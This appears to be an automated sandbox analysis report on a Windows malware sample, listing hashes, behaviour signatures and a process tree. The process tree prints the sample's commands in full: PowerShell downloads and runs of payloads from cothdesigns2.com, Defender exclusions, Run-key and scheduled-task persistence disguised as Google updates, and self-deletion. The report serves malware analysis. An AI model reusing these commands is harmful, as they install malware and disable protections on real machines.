Analysis

  • max time kernel
    70s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
  • submitted
    21/09/2022, 06:12

General

  • Target

    303359be5a96f2404af7e635640b257d.exe

  • Size

    138KB

  • MD5

    303359be5a96f2404af7e635640b257d

  • SHA1

    eed5a46a5605103022aee765c65b0edae9d33ebf

  • SHA256

    0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c

  • SHA512

    526f035c53e3d5c6289f08dae106e8c955e83d1503a4bfd906e3f6997ee45f10cc942b55850e214036fbd560a568a3b4580eed4ad7d80977d2daa0e4681a00fc

  • SSDEEP

    3072:rw7s+ebZ7usUCAco7ILE0+50u+kKVzdCf/z8:rn+ebTUCAco7IZLYCZI/

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe
    "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4360
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4420
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
          PID:2656
    • C:\ProgramData\Google\unzip.exe
      "C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4332
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\SysWOW64\netsh.exe
          netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
          3⤵
            PID:2448
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\SysWOW64\netsh.exe
            netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
            3⤵
              PID:1116
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'unzip.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4344
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
              3⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:376
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\SysWOW64\reg.exe
              reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
              3⤵
              • Adds policy Run key to start application
              • Modifies registry key
              PID:2800
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4712
        • C:\ProgramData\Google\unzip.exe
          "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo2.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
          1⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3192
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
              3⤵
              • Creates scheduled task(s)
              PID:5008
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
            2⤵
              PID:2104

          Network

          MITRE ATT&CK Enterprise v6

          Downloads

          • C:\ProgramData\Google\unzip.exe

            Filesize

            423KB

            MD5

            c32ca4acfcc635ec1ea6ed8a34df5fac

            SHA1

            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

            SHA256

            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

            SHA512

            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\unzip.exe.log

            Filesize

            1KB

            MD5

            33b19d75aa77114216dbc23f43b195e3

            SHA1

            36a6c3975e619e0c5232aa4f5b7dc1fec9525535

            SHA256

            b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

            SHA512

            676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            11KB

            MD5

            6f70bee5b4fdfe8bd6ad40dda95958bc

            SHA1

            4c93c522be8ce54fb6bc5a06591e2c575019fa54

            SHA256

            6c466d9e0b3b6df97dc26bfd895437ecb76578fa3ecf931f8afe45074f775557

            SHA512

            0e10c86877cb8f6bf3b80616f16376cb8cb0f51b3ba86dbd514e11e17973d81d7b63653fd6f523f19954fbd1c2dfa65d708cb4b0ef217cc59cd2f7f8d03fe55a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            652B

            MD5

            463625693bec391366208ad1001bc278

            SHA1

            fa4778383968bc17ff1622bb5d6b6cf69bdc40da

            SHA256

            cb464bf4a3d693150bd03037fabbfa339ac3afa911fe90d7239885ad8ec62914

            SHA512

            19c1b19f4eb24f268de1bb71089d017be7295bde81247625ca8f010e0538fbbe73e0b80b25f0aaa69b366d156d1712a63d49df99aa2de02bdd4e7107fe6fc081

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            24e0a655c7d22ab9c6f673dc48b88dec

            SHA1

            41e66ecdb63d2a19392a33ddd8cca05db8974495

            SHA256

            744f0bb3357b13baae2f7ac0f5e4ba7daba3ea7a1ab8488da5c2924f6e0411af

            SHA512

            07e8fc4a72b9acd7203e9c4dfa792ac17fd749dda6738507d1ec2bd6994b7809f816ea64ee97430d5df66151da8bbc65a1f03751a75b42e61653721865e904ce

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            5fb3c65a3ebc7bc049aac5b6a3d92c1b

            SHA1

            aa0166b946bdf9e7ea19f81008cf7a7a200b8063

            SHA256

            809705808a35f5f7bb4eb4d506d2f9e9b31c3198f1ced0fc74f6faf47a76e14f

            SHA512

            9a7fa691c04c0bda84bb3c6709b30ae0a65d8ab09e9267f2fa44396075760a22a903d766e41834638d4e3a2e133a39b81fc71aef057ff4b3214242e15e2772bd

          • memory/1352-147-0x0000000005C50000-0x0000000005C6E000-memory.dmp

            Filesize

            120KB

          • memory/4344-167-0x0000000007E20000-0x0000000007E28000-memory.dmp

            Filesize

            32KB

          • memory/4344-154-0x00000000079C0000-0x00000000079F2000-memory.dmp

            Filesize

            200KB

          • memory/4344-155-0x00000000711C0000-0x000000007120C000-memory.dmp

            Filesize

            304KB

          • memory/4344-156-0x0000000006DC0000-0x0000000006DDE000-memory.dmp

            Filesize

            120KB

          • memory/4344-165-0x0000000007D30000-0x0000000007D3E000-memory.dmp

            Filesize

            56KB

          • memory/4344-166-0x0000000007E40000-0x0000000007E5A000-memory.dmp

            Filesize

            104KB

          • memory/4344-159-0x0000000007B80000-0x0000000007B8A000-memory.dmp

            Filesize

            40KB

          • memory/4344-146-0x0000000005950000-0x00000000059B6000-memory.dmp

            Filesize

            408KB

          • memory/4344-141-0x0000000005A00000-0x0000000006028000-memory.dmp

            Filesize

            6.2MB

          • memory/4344-162-0x0000000007D80000-0x0000000007E16000-memory.dmp

            Filesize

            600KB

          • memory/4360-142-0x00007FFA10A30000-0x00007FFA114F1000-memory.dmp

            Filesize

            10.8MB

          • memory/4360-132-0x000002E0D72A0000-0x000002E0D72C8000-memory.dmp

            Filesize

            160KB

          • memory/4360-135-0x00007FFA10A30000-0x00007FFA114F1000-memory.dmp

            Filesize

            10.8MB

          • memory/4712-153-0x00000000068B0000-0x00000000068CA000-memory.dmp

            Filesize

            104KB

          • memory/4712-152-0x0000000007A60000-0x00000000080DA000-memory.dmp

            Filesize

            6.5MB

          • memory/4712-145-0x00000000053A0000-0x0000000005406000-memory.dmp

            Filesize

            408KB

          • memory/4712-139-0x0000000002AA0000-0x0000000002AD6000-memory.dmp

            Filesize

            216KB

          • memory/4748-144-0x0000000005280000-0x00000000052A2000-memory.dmp

            Filesize

            136KB